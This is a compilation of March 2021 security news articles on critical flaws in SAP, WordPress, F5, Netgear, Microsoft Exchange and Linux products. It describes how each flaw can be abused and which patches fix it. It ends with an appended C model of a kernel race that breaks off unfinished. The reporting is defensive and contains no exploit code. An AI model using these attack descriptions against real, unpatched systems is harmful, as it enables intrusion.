SAP MII Security Flaw: Remote Code Execution
The vulnerability in SAP MII (CVE-2021-21480) is a code injection vulnerability, in which code is inserted into the language of a targeted application and executed by the server-side interpreter. The flaw has a CVSS score of 9.9 out of 10. Versions 15.1, 15.2, 15.3 and 15.4 are affected, according to SAP.

SAP MII is a NetWeaver AS Java-based platform, which allows for real-time monitoring of production and data analysis for insights into performance efficiency.

The flaw stems from a component of SAP MII called Self-Service Composition Environment (SSCE), which is utilized to design dashboards for real-time data analysis. These dashboards can be saved as a Java Server Pages (JSP) file. However, an attacker can remotely intercept a JSP request to the server, inject it with malicious code, and then forward it to the server.

“When such an infected dashboard is opened in production by a user having a minimum of authorizations, the malicious content gets executed, leading to remote code execution in the server,” said Onapsis researchers.

That could lead to various malicious attacks, including access to SAP databases and the ability to read, modify or erase records; pivoting to other servers; infecting end users with malware and modifying network configurations to potentially affect internal networks.

Researchers strongly recommend applying the corresponding patch as soon as possible.

“The patch will prevent dashboards from being saved as JSP files,” said Onapsis researchers. “Unfortunately, there is no more flexible solution available. If JSP files are required, customers should restrict access to the SSCE as much as possible and validate any JSP content manually before moving it to production.”

SAP NetWeaver AS Java Flaw
Another serious flaw exists in SAP NetWeaver AS Java, versions 7.10, 7.11, 7.30, 7.31, 7.40 and 7.50. Specifically, the MigrationService component is affected, in that it lacks authorization checks.

This flaw (CVE-2021-21481) ranks 9.6 on the CVSS scale, making it critical severity.

SAP NetWeaver AS Java is typically used internally for migrating applications between major releases for the AS Java engine.

“The missing authorization check might allow an unauthorized attacker to gain administrative privileges,” said researchers. “This could result in complete compromise of the system’s confidentiality, integrity and availability.”

Other Serious SAP Security Flaws
Beyond these two serious flaws, SAP also fixed an authentication bypass (CVE-2021-21484) in SAP HANA (Version 2.0). It also made updates to two previous security updates – including a missing authentication check in SAP Solution Manager (from a security note released in March 2020) and a security update for Google Chromium (from a security note released in April 2018). SAP did not give further details on the updates for these security notes.

The fixes come after a February security update by SAP fixing a critical vulnerability in its Commerce platform for e-commerce businesses. If exploited, the flaw could allow for remote code execution that ultimately could compromise or disrupt the application.

The fixes also come during a busy Patch Tuesday week. Microsoft’s regularly scheduled March Patch Tuesday updates addressed 89 security vulnerabilities overall, including 14 critical flaws and 75 important-severity flaws.

Also released on Tuesday were Adobe’s security updates, addressing a cache of critical flaws, which, if exploited, could allow for arbitrary code execution on vulnerable Windows systems.


Cyberattackers Exploiting Critical WordPress Plugin Bug
11.3.2021
Vulnerebility  Threatpost

The security hole in the Plus Addons for Elementor plugin was used in active zero-day attacks prior to a patch being issued.

The Plus Addons for Elementor plugin for WordPress has a critical security vulnerability that attackers can exploit to quickly, easily and remotely take over a website. First reported as a zero-day bug, researchers said it’s being actively attacked in the wild.

The plugin, which has more than 30,000 active installations according to its developer, allows site owners to create various user-facing widgets for their websites, including user logins and registration forms that can be added to an Elementor page. Elementor is a site-building tool for WordPress.

The bug (CVE-2021-24175) is a privilege-escalation and authentication-bypass issue that exists in this registration form function of the Plus Addons for Elementor. It rates 9.8 on the CVSS vulnerability scale, making it critical in severity.

“Unfortunately, this functionality was improperly configured and allowed attackers to register as an administrative user, or to log in as an existing administrative user,” according to researchers at Wordfence, in a posting this week. They added that it arises from broken session management, but didn’t provide further technical details.

Exploited as a Zero-Day Bug
The bug was first reported to WPScan by Seravo, a web-hosting company, as a zero-day under active attack by cybercriminals.

“The plugin is being actively exploited by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin,” according to WPScan’s overview.

As for how cybercriminals are using the exploit in the wild, Wordfence noted that indicators of compromise point to attackers creating privileged accounts and then using them to further compromise the site.

“We believe that attackers are adding user accounts with usernames as the registered email address based on how the vulnerability creates user accounts, and in some cases installing a malicious plugin labeled ‘wpstaff,'” researchers said.

Worryingly, they added that the vulnerability can still be exploited even if there’s no active login or registration page that was created with the plugin, and even if registration and logins are suspended or disabled.

“This means that any site running this plugin is vulnerable to compromise,” according to the Wordfence posting.

How to Fix the Plus Addons for Elementor Security Vulnerability
The vulnerability was reported on Monday, and fully patched a day later. Site admins should upgrade to version 4.1.7 of The Plus Addons for Elementor to avoid compromise, and they should check for “any unexpected administrative users or plugins you did not install,” according to Wordfence. The Plus Addons for Elementor Lite does not contain the same vulnerability, the firm added.

“If you are using The Plus Addons for Elementor plugin, we strongly recommend that you deactivate and remove the plugin completely until this vulnerability is patched,” researchers said. “If the free version will suffice for your needs, you can switch to that version for the time being.”

WordPress Plugin Problems Persist
WordPress plugins continue to offer an attractive avenue of attack for cybercriminals.

In January, researchers warned of two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.

Also that month, a plugin called PopUp Builder, used by WordPress websites for building pop-up ads for newsletter subscriptions, was found to have a vulnerability that could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.

And in February, an unpatched, stored cross-site scripting (XSS) security bug was found to potentially affect 50,000 Contact Form 7 Style plugin users.


A flaw in The Plus Addons for Elementor WordPress plugin allows sites takeover
11.3.2021 Vulnerebility  Securityaffairs

Researchers from the Wordfence team found a critical vulnerability in The Plus Addons for Elementor WordPress plugin that could be exploited to take over a website.
Researchers at the Wordfence team of the security firm Defiant have spotted a critical flaw in The Plus Addons for Elementor WordPress plugin that could be exploited by attackers to gain administrative privileges on a website and take it over. The researchers also warn that the zero-day vulnerability has been exploited in the wild.

The Plus Addons for Elementor allows users to add several widgets to Elementor, the popular WordPress website builder; it has more than 30,000 installations to date.

Wordfence researchers discovered the vulnerability in one of the widgets that the plugin provides, which lets designers and developers insert user login and registration forms into Elementor pages.
The flaw allows attackers to create new administrative user accounts on vulnerable sites when user registration is enabled, and to log in as other administrative users. The vulnerability was reported to WPScan by the Seravo hosting company.
“The flaw makes it possible for attackers to create new administrative user accounts on vulnerable sites, if user registration is enabled, along with logging in as other administrative users.” reads the post published by Wordfence.
The vulnerability doesn’t affect the free version of the plugin, The Plus Addons for Elementor Lite.

The development team behind the plugin has fully patched the flaw on March 9th with the release of version 4.1.7. Users are highly recommended to update to this version immediately to prevent attacks.
At the time of this writing, experts have very limited indicators of compromise. Based on how the vulnerability creates user accounts, attackers are adding user accounts whose usernames are the registered email address; in some cases the experts observed attackers installing a malicious plugin labeled wpstaff.

“We strongly recommend checking your site for any unexpected administrative users or plugins you did not install.” continues the post.

The researchers pointed out that threat actors in the wild are actively exploiting the vulnerability.

The researchers also created a proof-of-concept exploit code for this vulnerability.


F5 Patches Four Critical Bugs in Big-IP Suite
11.3.2021 Vulnerebility  Securityweek

Application services and network delivery firm F5 on Wednesday announced the release of patches for seven related vulnerabilities in BIG-IP, including four with a "critical" severity rating.

The BIG-IP software powers a wide range of products, including hardware, modularized software, and virtual appliances, which run on the TMOS architecture and provide customers with modules that support load balancing, firewall, access control, threat protection, and more.

On March 10, F5 announced the release of fixes for multiple vulnerabilities in BIG-IP, some of which also impact BIG-IQ, a framework designed to help with the management of BIG-IP devices and application services.

Four critical vulnerabilities in BIG-IP were announced, including one impacting BIG-IQ, along with seven high severity vulnerabilities and ten medium severity. However, only two of the high-risk bugs and one of the medium bugs are related to the critical flaws.

“The bottom line is that they affect all BIG-IP and BIG-IQ customers and instances—we urge all customers to update their BIG-IP and BIG-IQ deployments to the fixed versions as soon as possible,” F5 says.

The most important of the four critical bugs is CVE-2021-22986 (CVSS score of 9.8), an unauthenticated remote command execution vulnerability in the iControl REST interface, which impacts both BIG-IP and BIG-IQ, F5 says.

An unauthenticated attacker that has network access to the iControl REST could execute arbitrary system commands, manipulate files, or disable services. Exploitation is only possible through the control plane and could lead to complete system compromise, F5 explains.

Tracked as CVE-2021-22987 (CVSS score of 9.9), the second critical bug affects the Traffic Management User Interface (TMUI) -- which is also known as the Configuration utility -- when running in Appliance mode, and could be abused by an authenticated remote attacker for command execution and complete system compromise.

Two high severity -- CVE-2021-22988 (CVSS score: 8.8) and CVE-2021-22989 (CVSS score: 8.0) -- and one medium risk -- CVE-2021-22990 (CVSS score: 6.6) -- authenticated remote command execution flaws were also addressed in the TMUI. Tracked as CVE-2021-22991 and featuring a CVSS score of 9.0, the third critical vulnerability patched today resides in the incorrect handling of undisclosed requests to a virtual server, which could trigger a buffer overflow, leading to denial of service, or even bypass of URL-based access control and even remote code execution (RCE).

Also featuring a CVSS score of 9.0, the fourth critical bug is CVE-2021-22992, a buffer overflow that could be triggered through malicious HTTP responses to an Advanced WAF/BIG-IP ASM virtual server. Exploitation could lead to denial of service or remote code execution, thus resulting in complete system compromise, F5 explains.

F5 also announced 14 unrelated CVEs (five high severity and nine medium risk), but did not share details on them alongside the aforementioned seven vulnerabilities.

“We strongly recommend that all customers update their BIG-IP and BIG-IQ deployments to a fixed version as soon as possible—this is the only way to fully address the vulnerabilities,” F5 added.


SAP Patches Critical Flaws in MII, NetWeaver Products
11.3.2021
Vulnerebility  Securityweek

SAP's March 2021 Security Patch Day updates include 9 new security notes, including two for critical vulnerabilities affecting the company's NetWeaver Application Server (AS) and Manufacturing Integration and Intelligence (MII) products.

This month’s set of patches also includes 4 updates to previously released Patch Day security notes, including updates for two notes rated Hot News (CVSS score 10), which address a missing authorization check in Solution Manager (CVE-2020-6207) and deliver the latest patches for the Chromium browser in Business Client.

The most severe of the newly released security notes addresses a code injection vulnerability in SAP MII. Tracked as CVE-2021-21480, the vulnerability features a CVSS score of 9.9.

Based on NetWeaver AS Java, SAP MII provides monitoring and data analysis capabilities, capturing data from production machinery and providing real-time information on performance and efficiency.

The critical vulnerability was identified in the Self-Service Composition Environment (SSCE) component, which allows the creation of dashboards (via drag-and-drop) that can be saved as JSP files. The flaw allows an attacker to inject malicious JSP code in a request to the server, which would then be executed when the infected dashboard is opened.

Exploitation of the bug would allow an attacker to access SAP databases and tamper with records, move laterally to other servers, inject malware, and modify network configurations to potentially compromise internal networks.

The second Hot News security note that SAP released on Tuesday addresses a missing authorization check in the Migration Service of NetWeaver AS Java (CVE-2021-21481, CVSS score 9.6).

Used internally to migrate applications between J2EE Engine releases, the service could be abused to gain administrative privileges and potentially fully compromise the vulnerable system. The fix for this vulnerability requires a system restart, Onapsis, a firm that specializes in securing SAP applications, explains.

This month, SAP released a single high-severity security note, to address a possible authentication bypass in HANA LDAP scenarios (CVE-2021-21484, CVSS score 7.7). Successful exploitation requires that the LDAP directory server enables unauthenticated bind and that SAP HANA has been configured to automatically create users and allow access based on LDAP authentication.

All of the remaining security notes included in the March 2021 Security Patch Day are rated medium severity. They address missing authorization checks, an insecure deserialization issue, a reverse TabNabbing vulnerability, improper input validation, and a server-side request forgery bug.


Unpatched Flaws in Netgear Business Switches Expose Organizations to Attacks
11.3.2021
Vulnerebility  Securityweek

Security researchers have identified multiple vulnerabilities in ProSAFE Plus JGS516PE and GS116Ev2 business switches from Netgear, the most severe of which could allow a remote, unauthenticated attacker to execute arbitrary code.

A total of 15 vulnerabilities affecting Netgear switches that use the ProSAFE Plus configuration utility were found to expose users to various risks, according to researchers with IT security firm NCC Group.

The most important of these bugs is CVE-2020-26919, an unauthenticated remote code execution flaw rated critical severity (CVSS score of 9.8).

Affecting firmware versions prior to 2.6.0.43, the bug is related to the internal management web application not implementing the correct access controls, which could allow attackers to bypass authentication and run code with the privileges of the administrator.

“Due to the ability to execute system commands through the ‘debug’ web sections, a successful exploitation of this vulnerability can lead to remote code execution on the affected device,” NCC Group notes.

The researchers also discovered that the Netgear Switch Discovery Protocol (NSDP), a network protocol functioning as a discovery method that also allows for switch management, fails to properly handle authentication packages, thus leading to authentication bypasses (CVE-2020-35231, CVSS score of 8.8).

An attacker able to exploit this vulnerability “could execute any management actions in the device, including wiping the configuration by executing a factory restoration,” the researchers say.

NCC Group says that Netgear has informed them that the NSDP has reached end of life (EOL) and that none of the issues identified in it will be addressed. Users are advised to disable the remote management feature.

“Netgear reported that most of the vulnerabilities affecting the NSDP protocol were known due to end-of-life years ago and it is still enabled for legacy reasons, for customers who preferred to use Prosafe Plus. Furthermore, we were informed that, due to hardware limitations, it is not possible to implement many of the standard encryption protocols, such as those needed to implement HTTPS,” NCC Group notes.

The researchers also found issues with the firmware update mechanism on the vulnerable switches. One of them, CVE-2020-35220 (CVSS score of 8.3), could allow attackers to upload custom firmware files without administrative rights.

The second issue (CVE-2020-35232, CVSS score of 8.1) resides in the improper implementation of internal checks, which could allow attackers to craft firmware files that could “overwrite the entire memory with custom code.”

Other high-severity vulnerabilities in Netgear’s switches could lead to denial of service (CVE-2020-35224, CVSS score 8.1), or could allow an attacker to generate valid passwords (CVE-2020-35221, CVSS score 7.5) or perform requests using a single authenticated packet (CVE-2020-35229, CVSS score 7.5).

A stored XSS issue in language settings (CVE-2020-35228, CVSS score 7.2) could be abused to inject JavaScript code that would be executed on all webpages, while a buffer overflow (CVE-2020-35227, CVSS score 7.2) could be abused to cause a system reboot, among others.

Another vulnerability in the NSDP protocol, the researchers discovered, could be abused to retrieve the DHCP status without authentication, thus allowing remote users to configure the service, likely leading to denial of service (CVE-2020-35226, CVSS score 7.1).

The security researchers also identified a series of medium-severity flaws, such as unauthenticated access to switch configuration parameters (CVE-2020-35222), TFTP unexpected behavior (CVE-2020-35233), integer overflow instances (CVE-2020-35230), write command buffer overflows (CVE-2020-35225), and ineffective cross-site request forgery protections (CVE-2020-35223).

In December 2020, Netgear released firmware version 2.6.0.48, which includes patches for CVE-2020-35220, CVE-2020-35232, CVE-2020-35233, and other issues. The remaining issues won’t receive patches, the researchers say.


Critical Pre-Auth RCE Flaw Found in F5 Big-IP Platform — Patch ASAP!
11.3.2021
Vulnerebility  Thehackernews

Application security company F5 Networks on Wednesday published an advisory warning of four critical vulnerabilities impacting multiple products that could result in a denial of service (DoS) attack and even unauthenticated remote code execution on target networks.

The patches concern a total of seven related flaws (from CVE-2021-22986 through CVE-2021-22992), two of which were discovered and reported by Felix Wilhelm of Google Project Zero in December 2020.

The four critical flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical pre-auth remote code execution (CVE-2021-22986) also affecting BIG-IQ versions 6.x and 7.x. F5 said it's not aware of any public exploitation of these issues.

Successful exploitation of these vulnerabilities could lead to a full compromise of vulnerable systems, including the possibility of remote code execution, as well as triggering a buffer overflow that leads to a DoS condition.

Urging customers to update their BIG-IP and BIG-IQ deployments to a fixed version as soon as possible, F5 Networks' Kara Sprague said the "vulnerabilities were discovered as a result of regular and continuous internal security testing of our solutions and in partnership with respected third parties working through F5's security program."

The vulnerabilities have been addressed in the following products:

BIG-IP versions: 16.0.1.1, 15.1.2.1, 14.1.4, 13.1.3.6, 12.1.5.3, and 11.6.5.3
BIG-IQ versions: 8.0.0, 7.1.0.3, and 7.0.0.2

Besides these flaws, Wednesday's patches also include fixes for 14 other unrelated security issues.

The fixes are notable for the fact that it's the second time in as many years that F5 has revealed flaws that could allow remote code execution.

The latest update to BIG-IP software arrives less than a year after the company addressed a similar critical flaw (CVE-2020-5902) in early July 2020, with multiple hacking groups exploiting the bug to target unpatched devices, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a "broad scanning activity for the presence of this vulnerability across federal departments and agencies."

"This bug is probably going to fly under the radar, but this is a much bigger deal than it looks because it says something is really really broken in the internal security process of F5 BIG-IP devices," said Matt "Pwn all the Things" Tait in a tweet.


Microsoft Ships Massive Security Patch Bundle
10.3.2021
Vulnerebility  Securityweek

It’s raining patches in the Microsoft Windows ecosystem.

The Redmond, Wash. software giant on Tuesday dropped a mega-batch of security updates with patches for a whopping 89 documented vulnerabilities, including one used in zero-day attacks against some in the white-hat hacker community.

This month’s Patch Tuesday whopper comes just one week after Microsoft scrambled out emergency fixes to provide cover for in-the-wild nation-state attacks targeting Exchange Server installations.

Microsoft has blamed those attacks on Chinese cyber-espionage actors operating from leased VPS (virtual private servers) in the United States. The APT group has hit tens of thousands of organizations around the world, including targeted sectors like defense contractors, policy think tanks, and NGOs.

Microsoft also provided cover for a separate Internet Explorer vulnerability (CVE-2021-26411) that was used by North Korean government-backed hackers to target security researchers in South Korea.

The IE zero-day (Internet Explorer, interestingly, remains widely deployed in South Korea) was flagged by security vendor ENKI in February alongside a warning about drive-by downloads via the IE browser. Security researchers at Kaspersky have linked the attacks to a sub-group under Lazarus, the infamous North Korean threat actor known for launching destructive malware and ransomware attacks across the globe.

In all, Microsoft documented 89 distinct vulnerabilities across a range of software and cloud-delivered products in its portfolio. The patches cover serious flaws in multiple Windows OS components, Office and Office Services and Web Apps, SharePoint Server, Visual Studio, Azure and Azure Sphere.

Microsoft slapped a critical rating on 14 of the 89 documented vulnerabilities, while 75 carry an “important” severity rating.

According to Microsoft, two of these bugs are listed as publicly known while five are listed as under active attack at the time of release.

As usual, TippingPoint ZDI has a comprehensive wrap-up of this month’s Microsoft patch release.


Adobe Patches Code Execution Flaws in Connect, Creative Cloud, Framemaker
10.3.2021
Vulnerebility  Securityweek

Adobe on Tuesday announced that it has patched critical code execution vulnerabilities in its Connect, Creative Cloud, and Framemaker products.

In the Creative Cloud desktop application, Adobe fixed three flaws rated critical, including arbitrary file overwrite and OS command injection issues that can lead to code execution, and an improper input validation issue that can be exploited for privilege escalation.

In its Connect product, the company addressed one critical input validation issue that can result in arbitrary code execution and three important-severity reflected cross-site scripting (XSS) flaws that can allow an attacker to execute arbitrary JavaScript code in the targeted user’s browser. XSS attacks typically require the victim to click on a specially crafted link.

In Framemaker, Adobe patched one critical out-of-bounds read vulnerability that can lead to code execution.

Adobe said it had found no evidence of exploitation for malicious purposes, and since all vulnerabilities have been assigned a priority rating of 3, the company likely does not expect them to ever be exploited in attacks.

The software giant has credited independent security researchers for most of the vulnerabilities fixed with these Patch Tuesday updates.

Adobe last month patched a Reader vulnerability that had been exploited in the wild, but no information has been made available on those attacks.


GitHub Informs Users of 'Potentially Serious' Authentication Bug
10.3.2021
Vulnerebility  Securityweek

GitHub on Monday informed users that it had discovered what it described as an “extremely rare, but potentially serious” security bug related to how some authenticated sessions were handled.

The Microsoft-owned software development platform said the issue was discovered on March 2 and an initial patch was rolled out on March 5. A second patch was released on March 8 and on the evening of the same day the company decided to invalidate all authenticated sessions to completely eliminate the possibility of exploitation.

The vulnerability, which GitHub said existed at various times between February 8 and March 5, was caused by a race condition that in extremely rare circumstances resulted in a user’s session being routed to the browser of a different authenticated user, providing this second user with a valid and authenticated session cookie for the first user’s account.

“It is important to note that this issue was not the result of compromised account passwords, SSH keys, or personal access tokens (PATs) and there is no evidence to suggest that this was the result of a compromise of any other GitHub systems,” noted Mike Hanley, GitHub’s recently appointed chief security officer. “Instead, this issue was due to the rare and isolated improper handling of authenticated sessions. Further, this issue could not be intentionally triggered or directed by a malicious user.”

Hanley said they learned about the issue as a result of an external report about anomalous behavior.

Less than 0.001% of authenticated sessions on GitHub.com were impacted and the company said there was no evidence that other products were affected.

“Out of an abundance of caution, and with a strong bias toward account security, we’ve invalidated all sessions on GitHub.com created prior to 12:03 UTC on March 8 to avoid even the remote possibility that undetected compromised sessions could still exist after the vulnerability was patched,” Hanley explained.


Microsoft releases IOC Detection Tool for Microsoft Exchange Server flaws
7.3.2021
Vulnerebility  Securityaffairs

After the disclosure of the Microsoft Exchange zero-days, the MS Exchange Server team has released a script to determine whether an install is vulnerable.
This week Microsoft released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported MS Exchange versions that are being actively exploited in the wild.

The US Cybersecurity and Infrastructure Security Agency (CISA) issued Emergency Directive 21-02 in response to the disclosure of the zero-day vulnerabilities in Microsoft Exchange.

Microsoft revealed that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers, read email accounts, and install backdoors to maintain access to victim environments.

The US CISA’s emergency directive orders federal agencies to urgently update or disconnect MS Exchange on-premises installs.

The MS Exchange Server team has released a script that administrators can use to check whether their installs are vulnerable to the recently disclosed vulnerabilities.

Microsoft released the tool as open source on GitHub; it can be used to check the status of Exchange servers.
“Formerly known as Test-Hafnium, this script automates all four of the commands found in the Hafnium blog post,” states Microsoft. “It also has a progress bar and some performance tweaks to make the CVE-2021-26855 test run much faster.

Download the latest release here: Download Test-ProxyLogon.ps1

The most typical usage of this script is to check all Exchange servers and save the output.”

The script automates the tests for the four zero-day vulnerabilities in Microsoft Exchange Server.

“Microsoft has released an updated script that scans Exchange log files for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021.” states CISA.

“CISA is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the Test-ProxyLogon.ps1 script—as soon as possible—to help determine whether their systems are compromised. For additional information on the script, see Microsoft’s blog HAFNIUM targeting Exchange Servers with 0-day exploits.”


Microsoft Shares Additional Mitigations for Exchange Server Vulnerabilities Under Attack
7.3.2021
Vulnerebility  Securityweek

Microsoft on Friday released alternative mitigation measures for organizations who have not been able to immediately apply emergency out-of-band patches released earlier this week that address vulnerabilities being exploited to siphon e-mail data from corporate Microsoft Exchange servers.

“These mitigations are not a remediation if your Exchange servers have already been compromised, nor are they full protection against attack,” Microsoft warned in a blog post. “We strongly recommend investigating your Exchange deployments using the hunting recommendations here to ensure that they have not been compromised. We recommend initiating an investigation in parallel with or after applying one of the following mitigation strategies.”

Microsoft also provided an Nmap script to help customers discover vulnerable servers within their infrastructure.

Security researchers have warned that multiple cyber-espionage groups have been targeting vulnerable Exchange servers. Some reports suggest that 30,000 or more organizations may have been hacked via the Exchange security holes.

Analysts say that HAFNIUM, a state-sponsored hacking group operating out of China, has been on an active hacking spree, with a massive espionage campaign underway to siphon data from organizations globally.

“This is the real deal. If your organization runs an OWA server exposed to the internet, assume compromise between 02/26-03/03,” Ex-CISA Chief Chris Krebs tweeted. “Check for 8 character aspx files in C:\inetpub\wwwroot\aspnet_client\system_web\. If you get a hit on that search, you’re now in incident response mode."

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also issued an alert Friday, urging organizations to upgrade their on-premises Microsoft Exchange servers to the latest supported version.

Cybersecurity firm Volexity, which was credited by Microsoft for reporting different parts of the attack chain, has published a blog post with technical details and a video demonstrating exploitation in action, along with known attacker IP addresses connected to the attacks. Volexity said it detected anomalous activity on two of its customers’ Microsoft Exchange servers in January 2021, which led to the discovery of the attacks.

"This is an active threat," White House press secretary Jennifer Psaki said in a press briefing Friday. "Everyone running these servers needs to act now to patch them. We are concerned that there are a large number of victims and are working with our partners to understand the scope of this."


Critics Blast Google’s Aim to Replace Browser Cookie with ‘FLoC’
6.3.2021
Vulnerebility  Threatpost

EFF worries that Google’s ‘privacy-first’ vision for the future may pose new privacy risks.

This month Google begins a public test of a technology it says will eventually replace browser cookies in an effort to boost Chrome browser user privacy. However, critics say the switch is a half-measure and does not protect the web movements of Chrome users adequately.

The Google solution, called Federated Learning of Cohorts (FLoC), is promoted as a way to put people’s privacy first by limiting the capability of third parties to track their activity across the web using cookies.

How Does Federated Learning of Cohorts Protect Privacy?
The as-yet unproven technology allows browsers to group people together by their interests, giving them more anonymity while still allowing for appropriately targeted advertising, which remains at the core of the company’s interest in outfitting its Chrome browser with FLoC. Google’s stance is that it will balance the need to preserve people’s privacy by preventing individual tracking with giving advertisers and publishers the relevant information they need to recognize their target audience.

However, FLoC also raises new questions of who should have the ultimate power when it comes to accessing private information about people’s online browsing habits, which privacy advocates think should ultimately be a far more egalitarian affair. The digital privacy group the Electronic Frontier Foundation (EFF) has even gone so far as to call FLoC a “terrible idea” in a blog post published Wednesday by staff technologist Benett Cyphers.

Why EFF is Critical of FLoC
Others worry that FLoC is just Google dressing up what is, at its core, another (albeit potentially less obtrusive) way to track people’s behavior to suit its targeted advertising agenda and ensure the company continues to drive the market.

“Google has announced that its tests show promising signs that FLoC is working,” wrote Malwarebytes Labs security researcher Pieter Arntz in a blog post published in January. “Is this a milestone on the road to more privacy, or just better concealed tracking technology?”

That is the central question, and it becomes more relevant than ever now that FLoC is reaching a broader audience, given Google Chrome’s strong position in the browser market and the company’s broad influence in the tech sector in general.

How FLoC Delivers a ‘Privacy First’ Experience
Google, naturally, is leading with its concern for privacy in its messaging and promotion of FLoC, stressing that the technology is a community effort that aims to include and balance the interests of everyone using the web, for profit or not.

The company last year announced its intent to remove support for third-party cookies and work on a better solution via a two-year plan that included a Privacy Sandbox, a collaboration with industry leaders, publishers and marketers, that would both “protect anonymity while still delivering results for advertisers and publishers,” David Temkin, Google’s director of product management for ads privacy and trust, wrote in a blog post published Wednesday.

“Even so, we continue to get questions about whether Google will join others in the ad tech industry who plan to replace third-party cookies with alternative user-level identifiers,” he wrote. “Today, we’re making explicit that once third-party cookies are phased out, we will not build alternate identifiers to track individuals as they browse across the web, nor will we use them in our products.”

FLoC’s latest tests show that it is effective at hiding individual browsing behavior, which cookies exposed, “within large crowds of people with common interests,” called “cohorts,” Temkin wrote.

Within Chrome, the company will make FLoC-based cohorts available for public testing through origin trials with the technology’s next release this month, then begin testing FLoC-based cohorts with advertisers in Google Ads in the second quarter. Chrome also will offer the first iteration of new user controls in April, expanding them after more proposals and feedback from the broader industry, he said.

“This points to a future where there is no need to sacrifice relevant advertising and monetization in order to deliver a private and secure experience,” Temkin wrote.

Potential for New Privacy Risks with FLoC
But not everyone is as enthusiastic about FLoC’s potential to take tracking out of browsers. The EFF’s Cyphers argued that by eliminating one way of tracking user activity, it’s introducing other, potentially more intrusive ways for third parties to observe what people are doing online.

“The core design involves sharing new information with advertisers,” he wrote. “Unsurprisingly, this also creates new privacy risks.”

Cyphers cited fingerprinting, or the practice of gathering many discrete pieces of information from a user’s browser to create a unique, stable identifier for that browser, as one emerging privacy threat.

While Google has promised that the vast majority of FLoC cohorts will comprise thousands of users each, so a cohort ID alone shouldn’t distinguish someone from others in their group, it “still gives fingerprinters a massive head start” that “will make it much easier for trackers to put together a unique fingerprint for FLoC users,” Cyphers wrote.

FLoC also will share new personal data with advertisers and marketers revealing information about their behavior, such as specific information about browsing history and general information about demographics or interests. This means “every site you visit will have a good idea about what kind of person you are on first contact, without having to do the work of tracking you across the web,” he wrote.

Moreover, Cyphers argued, technology like FLoC raises the question of whether behavioral targeting is a good idea in the first place and whether it should continue; he called the end of the cookie a “fork in the road” with two possible future scenarios ahead.

“In one, users get to decide what information to share with each site they choose to interact with,” Cyphers wrote. “No one needs to worry that their past browsing will be held against them—or leveraged to manipulate them—when they next open a tab.”

In the other, which he argued FLoC will continue to promote, people’s online behavior follows them across the web “as a label,” appearing innocent at a glance but highly valuable to those with the knowledge and intent to use it, or potentially abuse it, for their own interests.


Five privilege escalation flaws fixed in Linux Kernel
6.3.2021
Vulnerebility  Securityaffairs

Experts found five vulnerabilities in the Linux kernel, tracked as CVE-2021-26708, that could lead to local privilege escalation.
Positive Technologies researcher Alexander Popov found five high severity vulnerabilities in the Linux kernel that could lead to local privilege escalation.
The Linux kernel vulnerabilities are race conditions in the AF_VSOCK implementation; they were implicitly introduced in November 2019 in the commits c0cfa2d8a788fcf4 and 6a2c0962105ae8ce, which added VSOCK multi-transport support.

A race condition is the condition of an electronics, software, or other system where the system’s substantive behavior is dependent on the sequence or timing of other uncontrollable events. It becomes a bug when one or more of the possible behaviors is undesirable.

The race conditions stem from incorrect locking in net/vmw_vsock/af_vsock.c.

“CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are shipped as kernel modules in all major GNU/Linux distributions. The vulnerable modules are automatically loaded when you create a socket for AF_VSOCK. That is available for unprivileged users and user namespaces are not needed for that. These vulnerabilities are race conditions caused by wrong locking in net/vmw_vsock/af_vsock.c.” wrote Popov. “The race conditions were implicitly introduced in November 2019 in the commits c0cfa2d8a788fcf4 and 6a2c0962105ae8ce that added VSOCK multi-transport support. These commits were merged in the Linux kernel v5.5-rc1.”

The issues, collectively tracked as CVE-2021-26708, were introduced in kernel version 5.5 in November 2019 and received a CVSS score of 7.0.

The expert successfully developed a PoC exploit for local privilege escalation on Fedora 33 Server that bypasses x86_64 platform protections such as SMEP and SMAP.

The patch has been merged into mainline kernel version 5.11-rc7 and backported into affected stable trees.

Popov discovered other Linux kernel flaws in the past, including CVE-2019-18683 and CVE-2017-2636 vulnerabilities.


Privilege Escalation Bugs Patched in Linux Kernel
6.3.2021
Vulnerebility  Securityweek

A total of five vulnerabilities that could lead to local privilege escalation were recently identified and fixed in the Linux kernel.

Identified by Positive Technologies security researcher Alexander Popov, the high severity bugs resided in the virtual socket implementation of the Linux kernel.

Tracked as CVE-2021-26708 and featuring a CVSS score of 7.0, the security holes were introduced in Linux kernel version 5.5 in November 2019.

The vulnerabilities are the result of race conditions that were added with virtual socket (VSOCK) multi-transport support. All major GNU/Linux distributions are impacted, as the vulnerable kernel drivers (CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS) are shipped to all of them as kernel modules.

Upon the creation of an AF_VSOCK socket, the vulnerable modules are automatically loaded, Positive Technologies explains. The bugs can be abused by unprivileged users.

The issues, Popov says, are race conditions rooted in wrong locking in net/vmw_vsock/af_vsock.c.

The bug exists because the vsock_sock.transport pointer is copied to a local variable before lock_sock() is called, and that local copy is then used after the lock is taken. The vsock_sock.transport value may change in the window before lock_sock() is called, which is the race condition.

The suggested fix involves copying the vsock_sock.transport pointer to the local value after lock_sock() has been called.
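To make the locking mistake concrete, here is an added single-threaded model of the vulnerable and fixed patterns described above (CVE-2021-26708). It is not kernel code and not Popov's work: lock_sock()/release_sock(), the transport struct and the "other task" hook are simplified stand-ins, and the second task's reassignment is modelled as a callback that runs only while the socket lock is free.

```c
#include <stdbool.h>
#include <stdio.h>

/* A transport backend. `destroyed` models the object having been torn down;
 * in the real kernel, touching it afterwards would be a use-after-free. */
struct vsock_transport {
    const char *name;
    bool destroyed;
};

/* Minimal stand-in for the kernel's struct vsock_sock. */
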